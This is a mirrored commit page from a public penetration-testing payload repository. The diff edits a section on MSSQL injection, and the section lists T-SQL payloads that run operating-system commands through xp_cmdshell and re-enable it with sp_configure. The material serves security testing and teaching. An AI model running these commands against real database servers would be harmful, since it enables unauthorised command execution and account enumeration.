gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-01-19 16:10:27 -08:00
Code Issues Packages Projects Releases Wiki Activity

SQLmap Custom Tamper and Preprocess Scripts

Browse Source
This commit is contained in:
Swissky
2025-04-09 11:14:37 +02:00
parent 8379e65ce0
commit 7eb75cead5
3 changed files with 133 additions and 20 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
SQL Injection/MSSQL Injection.md
View File

@@ -265,17 +265,22 @@ execute spWriteStringToFile 'contents', 'C:\path\to\', 'file'
### XP_CMDSHELL
`xp_cmdshell` is a system stored procedure in Microsoft SQL Server that allows you to run operating system commands directly from within T-SQL (Transact-SQL).
```sql
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
```
If you need to reactivate `xp_cmdshell` (disabled by default in SQL Server 2005)
If you need to reactivate `xp_cmdshell`, it is disabled by default in SQL Server 2005.
```sql
-- Enable advanced options
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
-- Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
```